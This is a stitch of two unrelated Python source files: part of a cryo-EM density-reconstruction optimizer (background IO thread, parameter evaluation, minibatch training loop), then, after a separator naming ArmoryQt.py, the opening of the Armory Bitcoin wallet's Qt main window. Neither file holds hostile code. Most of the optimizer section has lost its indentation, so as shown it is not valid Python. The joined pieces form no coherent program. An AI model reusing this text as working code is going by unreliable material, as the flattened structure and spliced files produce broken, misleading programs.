stat[prefix+'_num_like_quantiles'] = [len(keeplikes)]
self.diagout.output(**diag)
self.statout.output(**stat)
self.likeout.output(**like)
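    # Background IO: ioworker() drains io_queue, whose items are
    # (iotype, fname, data) tuples -- 'mrc' writes a density map via writeMRC,
    # 'pkl' pickles data to fname, and 'cp' copies fname to the path in data.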
def ioworker(self):
while True:
iotype,fname,data = self.io_queue.get()
try:
if iotype == 'mrc':
writeMRC(fname,*data)
elif iotype == 'pkl':
with open(fname, 'wb') as f:
pickle.dump(data, f, protocol=2)
elif iotype == 'cp':
copyfile(fname,data)
            except Exception:
                print("ERROR DUMPING {0}: {1}".format(fname, sys.exc_info()[0]))
self.io_queue.task_done()
def __init__(self, expbase, cmdparams=None):
"""cryodata is a CryoData instance.
expbase is a path to the base of folder where this experiment's files
will be stored. The folder above expbase will also be searched
for .params files. These will be loaded first."""
BackgroundWorker.__init__(self)
# Create a background thread which handles IO
self.io_queue = Queue()
self.io_thread = Thread(target=self.ioworker)
self.io_thread.daemon = True
self.io_thread.start()
# General setup ----------------------------------------------------
self.expbase = os.path.join(expbase, 'logs')
self.outbase = None
        # Parameter setup --------------------------------------------------
# search above expbase for params files
_,_,filenames = next(os.walk(opj(expbase,'../')))
self.paramfiles = [opj(opj(expbase,'../'), fname) \
for fname in filenames if fname.endswith('.params')]
# search expbase for params files
_,_,filenames = next(os.walk(opj(expbase)))
self.paramfiles += [opj(expbase,fname) \
for fname in filenames if fname.endswith('.params')]
if 'local.params' in filenames:
self.paramfiles += [opj(expbase,'local.params')]
# load parameter files
self.params = Params(self.paramfiles)
self.cparams = None
if cmdparams is not None:
# Set parameter specified on the command line
for k,v in cmdparams.items():
self.params[k] = v
# Dataset setup -------------------------------------------------------
self.imgpath = self.params['inpath']
psize = self.params['resolution']
if not isinstance(self.imgpath,list):
imgstk = MRCImageStack(self.imgpath,psize)
else:
imgstk = CombinedImageStack([MRCImageStack(cimgpath,psize) for cimgpath in self.imgpath])
if self.params.get('float_images',True):
imgstk.float_images()
self.ctfpath = self.params['ctfpath']
mscope_params = self.params['microscope_params']
if not isinstance(self.ctfpath,list):
ctfstk = CTFStack(self.ctfpath,mscope_params)
else:
ctfstk = CombinedCTFStack([CTFStack(cctfpath,mscope_params) for cctfpath in self.ctfpath])
self.cryodata = CryoDataset(imgstk,ctfstk)
self.cryodata.compute_noise_statistics()
if self.params.get('window_images',True):
imgstk.window_images()
minibatch_size = self.params['minisize']
testset_size = self.params['test_imgs']
partition = self.params.get('partition',0)
num_partitions = self.params.get('num_partitions',1)
seed = self.params['random_seed']
if isinstance(partition,str):
partition = eval(partition)
if isinstance(num_partitions,str):
num_partitions = eval(num_partitions)
if isinstance(seed,str):
seed = eval(seed)
self.cryodata.divide_dataset(minibatch_size,testset_size,partition,num_partitions,seed)
# self.cryodata.set_datasign(self.params.get('datasign','auto'))
# if self.params.get('normalize_data',True):
# self.cryodata.normalize_dataset()
self.voxel_size = self.cryodata.pixel_size
# Iterations setup -------------------------------------------------
self.iteration = 0
self.tic_epoch = None
self.num_data_evals = 0
self.eval_params()
outdir = self.cparams.get('outdir',None)
if outdir is None:
if self.cparams.get('num_partitions',1) > 1:
outdir = 'partition{0}'.format(self.cparams['partition'])
else:
outdir = ''
self.outbase = opj(self.expbase,outdir)
if not os.path.isdir(self.outbase):
os.makedirs(self.outbase)
# Output setup -----------------------------------------------------
self.ostream = OutputStream(opj(self.outbase,'stdout'))
self.ostream(80*"=")
self.ostream("Experiment: " + expbase + \
" Kernel: " + self.params['kernel'])
self.ostream("Started on " + socket.gethostname() + \
" At: " + time.strftime('%B %d %Y: %I:%M:%S %p'))
try:
print('gitutil:', gitutil.git_get_SHA1().decode('utf-8'))
self.ostream("Git SHA1: " + gitutil.git_get_SHA1().decode('utf-8'))
gitutil.git_info_dump(opj(self.outbase, 'gitinfo'))
except Exception:
print("Git info is not found.")
self.ostream("Fail to dump git information")
self.ostream(80*"=")
self.startdatetime = datetime.now()
# for diagnostics and parameters
self.diagout = Output(opj(self.outbase, 'diag'),runningout=False)
# for stats (per image etc)
self.statout = Output(opj(self.outbase, 'stat'),runningout=True)
# for likelihoods of individual images
self.likeout = Output(opj(self.outbase, 'like'),runningout=False)
self.img_likes = np.empty(self.cryodata.N_D)
self.img_likes[:] = np.inf
# optimization state vars ------------------------------------------
init_model = self.cparams.get('init_model',None)
if init_model is not None:
filename = init_model
if filename.upper().endswith('.MRC'):
M = readMRC(filename)
else:
                with open(filename, 'rb') as fp:
M = pickle.load(fp)
if type(M)==list:
M = M[-1]['M']
if M.shape != 3*(self.cryodata.N,):
M = cryoem.resize_ndarray(M,3*(self.cryodata.N,),axes=(0,1,2))
else:
init_seed = self.cparams.get('init_random_seed', np.random.randint(10)) + self.cparams.get('partition',0)
print("Randomly generating initial density (init_random_seed = {0})...".format(init_seed)); sys.stdout.flush()
tic = time.time()
M = cryoem.generate_phantom_density(self.cryodata.N, 0.95*self.cryodata.N/2.0, \
2*self.cryodata.N/128.0, 30, seed=init_seed)
print("done in {0}s".format(time.time() - tic))
# tic = time.time()
# print("Windowing and aligning initial density..."); sys.stdout.flush()
# window the initial density
# wfunc = self.cparams.get('init_window','circle')
# cryoem.window(M,wfunc)
# Center and orient the initial density
# cryoem.align_density(M)
# print("done in {0:.2f}s".format(time.time() - tic))
M_totalmass = self.params.get('M_totalmass', None)
if M_totalmass is not None:
M *= M_totalmass / M.sum()
N = M.shape[0]
# oversampling
oversampling_factor = self.params['oversampling_factor']
V = density.real_to_fspace_with_oversampling(M, oversampling_factor)
M = V.real ** 2 + V.imag ** 2
lowpass_freq = self.cparams.get('lowpass_freq', None)
if lowpass_freq is not None:
lowpass_filter = 1.0 - geometry.gen_dense_beamstop_mask(
N, 3, lowpass_freq, psize=self.cparams['pixel_size'])
M = lowpass_filter * M + 1.0 - lowpass_filter
beamstop_freq = self.cparams.get('beamstop_freq', None)
mask_3D = geometry.gen_dense_beamstop_mask(N, 3, beamstop_freq, psize=self.cparams['pixel_size'])
# apply the symmetry operator
init_sym = get_symmetryop(self.cparams.get('init_symmetry',self.cparams.get('symmetry',None)))
if init_sym is not None:
tic = time.time()
print("Applying symmetry operator..."); sys.stdout.flush()
M = init_sym.apply(M)
print("done in {0:.2f}s".format(time.time() - tic))
# tic = time.time()
# print("Scaling initial model..."); sys.stdout.flush()
modelscale = self.cparams.get('modelscale','auto')
# mleDC, _, mleDC_est_std = self.cryodata.get_dc_estimate()
if modelscale == 'auto':
# # Err on the side of a weaker prior by using a larger value for modelscale
# modelscale = (np.abs(mleDC) + 2*mleDC_est_std)/self.cryodata.N
# print("estimated modelscale = {0:.3g}...".format(modelscale)); sys.stdout.flush()
modelscale = 1.0
self.params['modelscale'] = modelscale
self.cparams['modelscale'] = modelscale
# M *= modelscale/M.sum()
# print("done in {0:.2f}s".format(time.time() - tic))
# if mleDC_est_std/np.abs(mleDC) > 0.05:
# print(" WARNING: the DC component estimate has a high relative variance, it may be inaccurate!")
# if ((modelscale*self.cryodata.N - np.abs(mleDC)) / mleDC_est_std) > 3:
# print(" WARNING: the selected modelscale value is more than 3 std devs different than the estimated one. Be sure this is correct.")
# save initial model
tic = time.time()
print("Saving initial model..."); sys.stdout.flush()
init_model_fname = os.path.join(self.expbase, 'init_model.mrc')
writeMRC(init_model_fname, M * mask_3D, psz=self.cparams['pixel_size'])
print("done in {0:.2f}s".format(time.time() - tic))
self.M = np.require(M,dtype=density.real_t)
# self.fM = density.real_to_fspace(M)
self.fM = M
self.dM = density.zeros_like(self.M)
self.step = eval(self.cparams['optim_algo'])
self.step.setup(self.cparams, self.diagout, self.statout, self.ostream)
# Objective function setup --------------------------------------------
param_type = self.cparams.get('parameterization','real')
cplx_param = param_type in ['complex','complex_coeff','complex_herm_coeff']
self.like_func = eval_objective(self.cparams['likelihood'])
self.prior_func = eval_objective(self.cparams['prior'])
if self.cparams.get('penalty',None) is not None:
self.penalty_func = eval_objective(self.cparams['penalty'])
prior_func = SumObjectives(self.prior_func.fspace, \
[self.penalty_func,self.prior_func], None)
else:
prior_func = self.prior_func
self.obj = SumObjectives(cplx_param,
[self.like_func,prior_func], [None,None])
self.obj.setup(self.cparams, self.diagout, self.statout, self.ostream)
self.obj.set_dataset(self.cryodata)
self.obj_wrapper = ObjectiveWrapper(param_type)
self.last_save = time.time()
self.logpost_history = FiniteRunningSum()
self.like_history = FiniteRunningSum()
# Importance Samplers -------------------------------------------------
self.is_sym = get_symmetryop(self.cparams.get('is_symmetry',self.cparams.get('symmetry',None)))
self.sampler_R = FixedFisherImportanceSampler('_R',self.is_sym)
self.sampler_I = FixedFisherImportanceSampler('_I')
# self.sampler_S = FixedGaussianImportanceSampler('_S')
self.sampler_S = None
self.like_func.set_samplers(sampler_R=self.sampler_R,sampler_I=self.sampler_I,sampler_S=self.sampler_S)
def eval_params(self):
# cvars are state variables that can be used in parameter expressions
cvars = {}
cvars['cepoch'] = self.cryodata.get_epoch(frac=True)
cvars['epoch'] = self.cryodata.get_epoch()
cvars['iteration'] = self.iteration
cvars['num_data'] = self.cryodata.N_D_Train
cvars['num_batches'] = self.cryodata.N_batches
cvars['noise_std'] = np.sqrt(self.cryodata.noise_var)
cvars['data_std'] = np.sqrt(self.cryodata.data_var)
cvars['voxel_size'] = self.voxel_size
cvars['pixel_size'] = self.cryodata.pixel_size
cvars['prev_max_frequency'] = self.cparams['max_frequency'] if self.cparams is not None else None
# prelist fields are parameters that can be used in evaluating other parameter
# expressions, they can only depend on values defined in cvars
prelist = ['max_frequency']
skipfields = set(['inpath','ctfpath'])
cvars = self.params.partial_evaluate(prelist,**cvars)
if self.cparams is None:
self.max_frequency_changes = 0
else:
self.max_frequency_changes += cvars['max_frequency'] != cvars['prev_max_frequency']
cvars['num_max_frequency_changes'] = self.max_frequency_changes
cvars['max_frequency_changed'] = cvars['max_frequency'] != cvars['prev_max_frequency']
self.cparams = self.params.evaluate(skipfields,**cvars)
self.cparams['exp_path'] = self.expbase
self.cparams['out_path'] = self.outbase
if 'name' not in self.cparams:
self.cparams['name'] = '{0} - {1} - {2} ({3})'.format(self.cparams['dataset_name'], self.cparams['prior_name'], self.cparams['optimizer_name'], self.cparams['kernel'])
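        # Hypothetical illustration (expression syntax assumed, not shown in
        # this file): a .params entry can be an expression over the cvars
        # above, e.g.
        #   max_frequency = "min(0.5, 0.01 + 0.002*cepoch)"
        # which partial_evaluate()/evaluate() resolve against the current
        # optimizer state on every minibatch.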
def run(self):
while self.dowork(): pass
print("Waiting for IO queue to clear..."); sys.stdout.flush()
self.io_queue.join()
print("done."); sys.stdout.flush()
def begin(self):
BackgroundWorker.begin(self)
def end(self):
BackgroundWorker.end(self)
def dowork(self):
"""Do one atom of work. I.E. Execute one minibatch"""
timing = {}
# Time each minibatch
tic_mini = time.time()
self.iteration += 1
# Fetch the current batches
trainbatch = self.cryodata.get_next_minibatch(self.cparams.get('shuffle_minibatches',True))
# Get the current epoch
cepoch = self.cryodata.get_epoch(frac=True)
epoch = self.cryodata.get_epoch()
num_data = self.cryodata.N_D_Train
# Evaluate the parameters
self.eval_params()
timing['setup'] = time.time() - tic_mini
# Do hyperparameter learning
if self.cparams.get('learn_params',False):
tic_learn = time.time()
if self.cparams.get('learn_prior_params',True):
tic_learn_prior = time.time()
self.prior_func.learn_params(self.params, self.cparams, M=self.M, fM=self.fM)
timing['learn_prior'] = time.time() - tic_learn_prior
if self.cparams.get('learn_likelihood_params',True):
tic_learn_like = time.time()
self.like_func.learn_params(self.params, self.cparams, M=self.M, fM=self.fM)
timing['learn_like'] = time.time() - tic_learn_like
if self.cparams.get('learn_prior_params',True) or self.cparams.get('learn_likelihood_params',True):
timing['learn_total'] = time.time() - tic_learn
# Time each epoch
        if self.tic_epoch is None:
self.ostream("Epoch: %d" % epoch)
self.tic_epoch = (tic_mini,epoch)
elif self.tic_epoch[1] != epoch:
self.ostream("Epoch Total - %.6f seconds " % \
(tic_mini - self.tic_epoch[0]))
self.tic_epoch = (tic_mini,epoch)
sym = get_symmetryop(self.cparams.get('symmetry',None))
if sym is not None:
self.obj.ws[1] = 1.0/sym.get_order()
tic_mstats = time.time()
self.ostream(self.cparams['name'], " Iteration: %d" % self.iteration, \
" Epoch: %d" % epoch, " Host: %s" % socket.gethostname())
# Compute density statistics
N = self.cryodata.N
M_sum = self.M.sum(dtype=np.float64)
M_zeros = (self.M == 0).sum()
M_mean = M_sum/N**3
M_max = self.M.max()
M_min = self.M.min()
# self.ostream(" Density (min/max/avg/sum/zeros): " +
# "%.2e / %.2e / %.2e / %.2e / %g " %
# (M_min, M_max, M_mean, M_sum, M_zeros))
self.statout.output(total_density=[M_sum],
avg_density=[M_mean],
nonzero_density=[M_zeros],
max_density=[M_max],
min_density=[M_min])
timing['density_stats'] = time.time() - tic_mstats
# evaluate test batch if requested
if self.iteration <= 1 or self.cparams.get('evaluate_test_set',self.iteration%5):
tic_test = time.time()
testbatch = self.cryodata.get_testbatch()
self.obj.set_data(self.cparams,testbatch)
testLogP, res_test = self.obj.eval(M=self.M, fM=self.fM,
compute_gradient=False)
self.outputbatchinfo(testbatch, res_test, testLogP, 'test', 'Test')
timing['test_batch'] = time.time() - tic_test
else:
testLogP, res_test = None, None
# setup the wrapper for the objective function
tic_objsetup = time.time()
self.obj.set_data(self.cparams,trainbatch)
self.obj_wrapper.set_objective(self.obj)
x0 = self.obj_wrapper.set_density(self.M,self.fM)
evalobj = self.obj_wrapper.eval_obj
timing['obj_setup'] = time.time() - tic_objsetup
# Get step size
self.num_data_evals += trainbatch['N_M'] # at least one gradient
tic_objstep = time.time()
trainLogP, dlogP, v, res_train, extra_num_data = self.step.do_step(x0,
self.cparams,
self.cryodata,
evalobj,
batch=trainbatch)
# Apply the step
x = x0 + v
timing['step'] = time.time() - tic_objstep
# Convert from parameters to value
tic_stepfinalize = time.time()
prevM = np.copy(self.M)
self.M, self.fM = self.obj_wrapper.convert_parameter(x,comp_real=True)
apply_sym = sym is not None and self.cparams.get('perfect_symmetry',True) and self.cparams.get('apply_symmetry',True)
if apply_sym:
self.M = sym.apply(self.M)
# Truncate the density to bounds if they exist
if self.cparams['density_lb'] is not None:
np.maximum(self.M,self.cparams['density_lb']*self.cparams['modelscale'],out=self.M)
if self.cparams['density_ub'] is not None:
np.minimum(self.M,self.cparams['density_ub']*self.cparams['modelscale'],out=self.M)
# Compute net change
self.dM = prevM - self.M
# Convert to fourier space (may not be required)
        if self.fM is None or apply_sym \
           or self.cparams['density_lb'] is not None \
           or self.cparams['density_ub'] is not None:
# self.fM = density.real_to_fspace(self.M)
self.fM = self.M
timing['step_finalize'] = time.time() - tic_stepfinalize
# Compute step statistics
tic_stepstats = time.time()
step_size = np.linalg.norm(self.dM)
grad_size = np.linalg.norm(dlogP)
M_norm = np.linalg.norm(self.M)
self.num_data_evals += extra_num_data
inc_ratio = step_size / M_norm
self.statout.output(step_size=[step_size],
inc_ratio=[inc_ratio],
grad_size=[grad_size],
norm_density=[M_norm])
timing['step_stats'] = time.time() - tic_stepstats
        # Update importance sampling distributions
tic_isupdate = time.time()
self.sampler_R.perform_update()
self.sampler_I.perform_update()
if self.sampler_S is not None:
self.sampler_S.perform_update()
self.diagout.output(global_phi_R=self.sampler_R.get_global_dist())
self.diagout.output(global_phi_I=self.sampler_I.get_global_dist())
if self.sampler_S is not None:
self.diagout.output(global_phi_S=self.sampler_S.get_global_dist())
timing['is_update'] = time.time() - tic_isupdate
# Output basic diagnostics
tic_diagnostics = time.time()
self.diagout.output(iteration=self.iteration, epoch=epoch, cepoch=cepoch)
if self.logpost_history.N_sum != self.cryodata.N_batches:
self.logpost_history.setup(trainLogP,self.cryodata.N_batches)
self.logpost_history.set_value(trainbatch['id'],trainLogP)
if self.like_history.N_sum != self.cryodata.N_batches:
self.like_history.setup(res_train['L'],self.cryodata.N_batches)
self.like_history.set_value(trainbatch['id'],res_train['L'])
self.outputbatchinfo(trainbatch, res_train, trainLogP, 'train', 'Train')
# Dump parameters here to catch the defaults used in evaluation
self.diagout.output(params=self.cparams,
envelope_mle=self.like_func.get_envelope_mle(),
sigma2_mle=self.like_func.get_sigma2_mle(),
hostname=socket.gethostname())
self.statout.output(num_data=[num_data],
num_data_evals=[self.num_data_evals],
iteration=[self.iteration],
epoch=[epoch],
cepoch=[cepoch],
logp=[self.logpost_history.get_mean()],
like=[self.like_history.get_mean()],
sigma=[self.like_func.get_rmse()],
time=[time.time()])
timing['diagnostics'] = time.time() - tic_diagnostics
checkpoint_it = self.iteration % self.cparams.get('checkpoint_frequency',50) == 0
save_it = checkpoint_it or self.cparams['save_iteration'] or \
time.time() - self.last_save > self.cparams.get('save_time',np.inf)
if save_it:
tic_save = time.time()
self.last_save = tic_save
if self.io_queue.qsize():
print("Warning: IO queue has become backlogged with {0} remaining, waiting for it to clear".format(self.io_queue.qsize()))
self.io_queue.join()
self.io_queue.put(( 'pkl', self.statout.fname, copy(self.statout.outdict) ))
self.io_queue.put(( 'pkl', self.diagout.fname, deepcopy(self.diagout.outdict) ))
self.io_queue.put(( 'pkl', self.likeout.fname, deepcopy(self.likeout.outdict) ))
self.io_queue.put(( 'mrc', opj(self.outbase,'model.mrc'), \
(np.require(self.M,dtype=density.real_t),self.voxel_size) ))
self.io_queue.put(( 'mrc', opj(self.outbase,'dmodel.mrc'), \
(np.require(self.dM,dtype=density.real_t),self.voxel_size) ))
if checkpoint_it:
self.io_queue.put(( 'cp', self.diagout.fname, self.diagout.fname+'-{0:06}'.format(self.iteration) ))
self.io_queue.put(( 'cp', self.likeout.fname, self.likeout.fname+'-{0:06}'.format(self.iteration) ))
self.io_queue.put(( 'cp', opj(self.outbase,'model.mrc'), opj(self.outbase,'model-{0:06}.mrc'.format(self.iteration)) ))
timing['save'] = time.time() - tic_save
time_total = time.time() - tic_mini
self.ostream(" Minibatch Total - %.2f seconds Total Runtime - %s" %
(time_total, format_timedelta(datetime.now() - self.startdatetime) ))
self.statout.output(minibatch_time=[time_total])
return self.iteration < self.cparams.get('max_iterations',np.inf) and \
cepoch < self.cparams.get('max_epochs',np.inf)
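# Typical driver sketch (assumed; the original entry-point script is not part
# of this file): build the optimizer on an experiment directory that contains
# .params files, then iterate minibatches until a stopping criterion is hit.
#   optim = CryoOptimizer('exps/my_experiment', cmdparams={'kernel': 'sagd'})
#   optim.run()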
|
ArmoryQt.py
|
#!/usr/bin/python2
# -*- coding: UTF-8 -*-
##############################################################################
# #
# Copyright (C) 2011-2015, Armory Technologies, Inc. #
# Distributed under the GNU Affero General Public License (AGPL v3) #
# See LICENSE or http://www.gnu.org/licenses/agpl.html #
# #
# Copyright (C) 2016-17, goatpig #
# Distributed under the MIT license #
# See LICENSE-MIT or https://opensource.org/licenses/MIT #
# #
##############################################################################
import gettext
from copy import deepcopy
from datetime import datetime
import hashlib
import logging
import math
import os
import platform
import random
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
import glob
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import psutil
import CppBlockUtils as Cpp
from armorycolors import Colors, htmlColor, QAPP
from armoryengine.ALL import *
from armoryengine.Block import PyBlock
from armoryengine.Decorators import RemoveRepeatingExtensions
from armoryengine.PyBtcWalletRecovery import WalletConsistencyCheck
from SDM import SatoshiDaemonManager
from ui.QtExecuteSignal import QtExecuteSignal
# Setup translations
translator = QTranslator(QAPP)
app_dir = "./"
try:
app_dir = os.path.dirname(os.path.realpath(__file__))
except:
if OS_WINDOWS and getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
translator.load(GUI_LANGUAGE, os.path.join(app_dir, "lang/"))
QAPP.installTranslator(translator)
from armorymodels import *
from jasvet import verifySignature
import qrc_img_resources
from qtdefines import *
from qtdialogs import *
from ui.MultiSigDialogs import DlgSelectMultiSigOption, DlgLockboxManager, \
DlgMergePromNotes, DlgCreatePromNote, DlgImportAsciiBlock
from ui.Wizards import WalletWizard, TxWizard
from ui.toolsDialogs import MessageSigningVerificationDialog
from dynamicImport import MODULE_PATH_KEY, ZIP_EXTENSION, getModuleList, importModule,\
verifyZipSignature, MODULE_ZIP_STATUS, INNER_ZIP_FILENAME,\
MODULE_ZIP_STATUS_KEY, getModuleListNoZip, dynamicImportNoZip
import tempfile
# Set URL handler to warn before opening url
handler = URLHandler()
QDesktopServices.setUrlHandler("http", handler.handleURL)
QDesktopServices.setUrlHandler("https", handler.handleURL)
# Load our framework with OS X-specific code.
if OS_MACOSX:
import ArmoryMac
# HACK ALERT: Qt has a bug in OS X where the system font settings will override
# the app's settings when a window is activated (e.g., Armory starts, the user
# switches to another app, and then switches back to Armory). There is a
# workaround, as used by TeXstudio and other programs.
# https://bugreports.qt-project.org/browse/QTBUG-5469 - Bug discussion.
# http://sourceforge.net/p/texstudio/bugs/594/?page=1 - Fix is mentioned.
# http://pyqt.sourceforge.net/Docs/PyQt4/qapplication.html#setDesktopSettingsAware
# - Mentions that this must be called before the app (QAPP) is created.
QApplication.setDesktopSettingsAware(False)
if OS_WINDOWS:
from _winreg import *
MODULES_ZIP_DIR_NAME = 'modules'
class ArmoryMainWindow(QMainWindow):
""" The primary Armory window """
#############################################################################
def __init__(self, parent=None, splashScreen=None):
super(ArmoryMainWindow, self).__init__(parent)
self.isShuttingDown = False
# Load the settings file
self.settingsPath = CLI_OPTIONS.settingsPath
self.settings = SettingsFile(self.settingsPath)
# SETUP THE WINDOWS DECORATIONS
self.lblLogoIcon = QLabel()
if USE_TESTNET:
self.setWindowTitle('Armory - Bitcoin Wallet Management [TESTNET] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
elif USE_REGTEST:
self.setWindowTitle('Armory - Bitcoin Wallet Management [REGTEST] dlgMain')
self.iconfile = ':/armory_icon_green_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_green_h56.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_green_h56.png'))
else:
self.setWindowTitle('Armory - Bitcoin Wallet Management')
self.iconfile = ':/armory_icon_32x32.png'
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_h44.png'))
if Colors.isDarkBkgd:
self.lblLogoIcon.setPixmap(QPixmap(':/armory_logo_white_text_h56.png'))
# OS X requires some Objective-C code if we're switching to the testnet
# (green) icon. We should also use a larger icon. Otherwise, Info.plist
# takes care of everything.
if not OS_MACOSX:
self.setWindowIcon(QIcon(self.iconfile))
else:
if USE_TESTNET or USE_REGTEST:
self.iconfile = ':/armory_icon_green_fullres.png'
ArmoryMac.MacDockIconHandler.instance().setMainWindow(self)
ArmoryMac.MacDockIconHandler.instance().setIcon(QIcon(self.iconfile))
self.lblLogoIcon.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.netMode = NETWORKMODE.Offline
self.abortLoad = False
self.memPoolInit = False
self.needUpdateAfterScan = True
self.sweepAfterScanList = []
self.newWalletList = []
self.newZeroConfSinceLastUpdate = []
self.lastSDMStr = ""
self.doShutdown = False
self.downloadDict = {}
self.notAvailErrorCount = 0
self.satoshiVerWarnAlready = False
self.satoshiLatestVer = None
self.latestVer = {}
self.downloadDict = {}
self.satoshiHomePath = None
self.satoshiExeSearchPath = None
self.initSyncCircBuff = []
self.latestVer = {}
self.lastVersionsTxtHash = ''
self.dlgCptWlt = None
self.wasSynchronizing = False
self.entropyAccum = []
self.allLockboxes = []
self.lockboxIDMap = {}
self.cppLockboxWltMap = {}
self.broadcasting = {}
self.nodeStatus = None
self.numHeartBeat = 0
# Error and exit on both regtest and testnet
if USE_TESTNET and USE_REGTEST:
DlgRegAndTest(self, self).exec_()
# Full list of notifications, and notify IDs that should trigger popups
# when sending or receiving.
self.changelog = []
self.downloadLinks = {}
self.almostFullNotificationList = {}
self.notifyOnSend = set()
      self.notifyOnRecv = set()
self.versionNotification = {}
self.notifyIgnoreLong = []
self.notifyIgnoreShort = []
self.maxPriorityID = None
self.satoshiVersions = ['',''] # [curr, avail]
self.armoryVersions = [getVersionString(BTCARMORY_VERSION), '']
self.tempModulesDirName = None
self.internetStatus = None
self.lockboxLedgModel = None
#delayed URI parsing dict
self.delayedURIData = {}
self.delayedURIData['qLen'] = 0
#Setup the signal to spawn progress dialogs from the main thread
self.connect(self, SIGNAL('initTrigger') , self.initTrigger)
self.connect(self, SIGNAL('execTrigger'), self.execTrigger)
self.connect(self, SIGNAL('checkForNegImports'), self.checkForNegImports)
'''
With Qt, all GUI operations need to happen in the main thread. If
the GUI operation is triggered from another thread, it needs to
emit a Qt signal, so that Qt can schedule the operation in the main
thread. QtExecuteSignal is a utility class that handles the signaling
and delaying/threading of execution
'''
self.signalExecution = QtExecuteSignal(self)
#push model BDM notify signal
def cppNotifySignal(action, arglist):
self.signalExecution.executeMethod(\
self.handleCppNotification, action, arglist)
TheBDM.registerCppNotification(cppNotifySignal)
# We want to determine whether the user just upgraded to a new version
self.firstLoadNewVersion = False
currVerStr = 'v'+getVersionString(BTCARMORY_VERSION)
if self.settings.hasSetting('LastVersionLoad'):
lastVerStr = self.settings.get('LastVersionLoad')
if not lastVerStr==currVerStr:
LOGINFO('First load of new version: %s', currVerStr)
self.firstLoadNewVersion = True
self.settings.set('LastVersionLoad', currVerStr)
# Because dynamically retrieving addresses for querying transaction
# comments can be so slow, I use this txAddrMap to cache the mappings
# between tx's and addresses relevant to our wallets. It really only
# matters for massive tx with hundreds of outputs -- but such tx do
# exist and this is needed to accommodate wallets with lots of them.
self.txAddrMap = {}
def updateProgress(val):
if splashScreen is not None:
splashScreen.updateProgress(val)
self.loadWalletsAndSettings(updateProgress)
eulaAgreed = self.getSettingOrSetDefault('Agreed_to_EULA', False)
if not eulaAgreed:
DlgEULA(self,self).exec_()
armoryengine.ArmoryUtils.DEFAULT_ADDR_TYPE = \
self.getSettingOrSetDefault('Default_ReceiveType', 'P2PKH')
if not self.abortLoad:
self.acquireProcessMutex()
# acquireProcessMutex may have set this flag if something went wrong
if self.abortLoad:
LOGWARN('Armory startup was aborted. Closing.')
os._exit(0)
# We need to query this once at the beginning, to avoid having
# strange behavior if the user changes the setting but hasn't
# restarted yet...
self.doAutoBitcoind = \
self.getSettingOrSetDefault('ManageSatoshi', not OS_MACOSX)
# This is a list of alerts that the user has chosen to no longer
# be notified about
alert_str = str(self.getSettingOrSetDefault('IgnoreAlerts', ""))
if alert_str == "":
alerts = []
else:
alerts = alert_str.split(",")
self.ignoreAlerts = {int(s):True for s in alerts}
# Setup system tray and register "bitcoin:" URLs with the OS
self.setupSystemTray()
self.setupUriRegistration()
self.heartbeatCount = 0
self.extraHeartbeatSpecial = []
self.extraHeartbeatAlways = []
self.extraHeartbeatOnline = []
self.extraNewTxFunctions = []
self.extraNewBlockFunctions = []
self.extraShutdownFunctions = []
self.extraGoOnlineFunctions = []
self.oneTimeScanAction = {}
self.walletDialogDict = {}
self.lblArmoryStatus = QRichLabel_AutoToolTip(self.tr('<font color=%1>Offline</font> ').arg(htmlColor('TextWarn')), doWrap=False)
self.statusBar().insertPermanentWidget(0, self.lblArmoryStatus)
# Table for all the wallets
self.walletModel = AllWalletsDispModel(self)
self.walletsView = QTableView(self)
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.walletsView.setModel(self.walletModel)
self.walletsView.setSelectionBehavior(QTableView.SelectRows)
self.walletsView.setSelectionMode(QTableView.SingleSelection)
self.walletsView.verticalHeader().setDefaultSectionSize(sectionSz)
self.walletsView.setMinimumSize(viewWidth, viewHeight)
self.walletsView.setItemDelegate(AllWalletsCheckboxDelegate(self))
self.walletsView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.walletsView.hideColumn(0)
if self.usermode == USERMODE.Standard:
initialColResize(self.walletsView, [20, 0, 0.35, 0.2, 0.2])
else:
initialColResize(self.walletsView, [20, 0.15, 0.30, 0.2, 0.20])
if self.settings.hasSetting('LastFilterState'):
if self.settings.get('LastFilterState')==4:
self.walletsView.showColumn(0)
self.connect(self.walletsView, SIGNAL('doubleClicked(QModelIndex)'),
self.execDlgWalletDetails)
self.connect(self.walletsView, SIGNAL('clicked(QModelIndex)'),
self.execClickRow)
self.walletsView.setColumnWidth(WLTVIEWCOLS.Visible, 20)
w,h = tightSizeNChar(GETFONT('var'), 100)
# Prepare for tableView slices (i.e. "Showing 1 to 100 of 382", etc)
self.numShowOpts = [100,250,500,1000,'All']
self.sortLedgOrder = Qt.AscendingOrder
self.sortLedgCol = 0
self.currLedgMin = 1
self.currLedgMax = 100
self.currLedgWidth = 100
btnAddWallet = QPushButton(self.tr("Create Wallet"))
btnImportWlt = QPushButton(self.tr("Import or Restore Wallet"))
self.connect(btnAddWallet, SIGNAL('clicked()'), self.startWalletWizard)
self.connect(btnImportWlt, SIGNAL('clicked()'), self.execImportWallet)
# Put the Wallet info into it's own little box
lblAvail = QLabel(self.tr("<b>Available Wallets:</b>"))
viewHeader = makeLayoutFrame(HORIZONTAL, [lblAvail, \
'Stretch', \
btnAddWallet, \
btnImportWlt, ])
wltFrame = QFrame()
wltFrame.setFrameStyle(QFrame.Box|QFrame.Sunken)
wltLayout = QGridLayout()
wltLayout.addWidget(viewHeader, 0,0, 1,3)
wltLayout.addWidget(self.walletsView, 1,0, 1,3)
wltFrame.setLayout(wltLayout)
# Make the bottom 2/3 a tabwidget
self.mainDisplayTabs = QTabWidget()
# Put the labels into scroll areas just in case window size is small.
self.tabDashboard = QWidget()
self.setupDashboard()
# Combo box to filter ledger display
self.comboWltSelect = QComboBox()
